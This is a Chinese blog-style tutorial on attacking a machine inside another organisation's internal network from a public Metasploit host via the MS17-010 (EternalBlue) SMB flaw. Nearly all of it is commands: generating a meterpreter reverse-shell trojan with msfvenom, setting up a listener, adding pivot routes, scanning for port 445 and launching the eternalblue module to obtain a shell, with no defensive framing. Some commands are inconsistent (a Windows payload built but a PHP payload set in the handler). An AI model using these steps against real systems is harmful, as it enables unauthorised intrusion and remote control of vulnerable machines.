利用公网Msf+MS17010跨网段攻击内网

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

一、准备工作

1.安装了Msf的公网主机+Ubuntu系统
2.一台其他服务器内网存在445漏洞
3.细心,细心,细心,钻研,钻研!!!

二、反弹一个shell

第一步:公网主机操作

生成msf木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

第二步:Msf监听端口:6666

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 111.111.111.111
set LPORT 6666
exploit

添加路由

run get_local_subnets (获取当前路由)
run autoroute -s 192.168.3.0/24 (添加路由)
run autorouute -d //删除添加的路由 (有需要才用)
run autoroute -p (查看已添加路由)

使用Payload进行攻击

background(转换到后台)
use scanner/portscan/tcp (先扫描开放445端口的PC)
exploit(开始扫描)

注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

如何列出那些存在445漏洞的PC?

使用MS17-010检测工具检测,github自行下载

攻击正式开始

use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
exploit(执行攻击)

攻击完成,并且会自动返回一个shell控制台

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章